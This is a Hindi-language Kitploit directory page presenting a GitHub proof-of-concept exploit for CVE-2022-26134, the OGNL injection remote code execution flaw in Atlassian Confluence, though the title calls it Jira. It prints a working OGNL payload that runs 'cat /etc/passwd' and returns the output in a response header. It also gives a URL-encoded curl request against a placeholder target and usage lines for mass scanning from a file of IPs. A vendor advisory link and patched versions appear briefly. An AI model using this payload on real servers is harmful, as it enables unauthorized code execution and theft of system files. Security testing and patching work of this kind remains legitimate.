Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2022-26134 — Atlassian Jira शोषण के लिए बस सरल PoC। सर्वर पर अनधिकृत उपयोगकर्ता के लिए कोड निष्पादन प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/iveresk/cve-2022-26134
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubiveresk/cve-2022-26134

cve-2022-26134

Atlassian Jira शोषण के लिए बस सरल PoC। सर्वर पर अनधिकृत उपयोगकर्ता के लिए कोड निष्पादन प्रदान करता है।

रिपॉजिटरी देखें
12424 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-26134 1vere$k द्वारा

Atlassian Jira exploit के लिए एक सरल PoC। सर्वर पर अनधिकृत उपयोगकर्ता के लिए कोड निष्पादन प्रदान करता है।

CVE-2022-26134 - OGNL इंजेक्शन भेद्यता।

यह स्क्रिप्ट एक प्रूफ ऑफ कॉन्सेप्ट है जो Atlassian Confluence 7.18 और निचले उत्पादों को प्रभावित करने वाली रिमोट कोड निष्पादन भेद्यता का शोषण करती है। OGNL इंजेक्शन भेद्यता एक अनधिकृत उपयोगकर्ता को Confluence Server या Data Center इंस्टेंस पर मनमाना कोड निष्पादित करने की अनुमति देती है।

पेलोड

root@kitploit:~
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

CURL कमांड के साथ उदाहरण:

root@kitploit:~
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D" 

फिर, कमांड का परिणाम रिस्पॉन्स हेडर में X-Cmd-Response पैरामीटर में दिखाई देगा।

विक्रेताओं से माइटिगेशन दिशानिर्देश

Atlassian की आधिकारिक अनुशंसाओं का पालन करें: https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

पैच किए गए संस्करण

Atlassian ने संस्करण 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 और 7.18.1 जारी किए हैं जिनमें इस समस्या के लिए एक पैच है।

उपयोग

root@kitploit:~
1. git clone https://github.com/iveresk/cve-2022-26134.git
2. cd cve-2022-26134
3. pip install -r requirements.txt
4. Ex#1: python3 cve-2022-26134.py <IP> <COMMAND> - command is optional - default will be set as "whoami" just to check if your server is vulnerable
5. Ex#2: 4. Ex#1: python3 cve-2022-26134.py <FILE-WITH-IPs> <COMMAND>

संपर्क

आप किसी भी विवरण के लिए Keybase के माध्यम से मुझसे संपर्क कर सकते हैं।

टूल डाउनलोड करें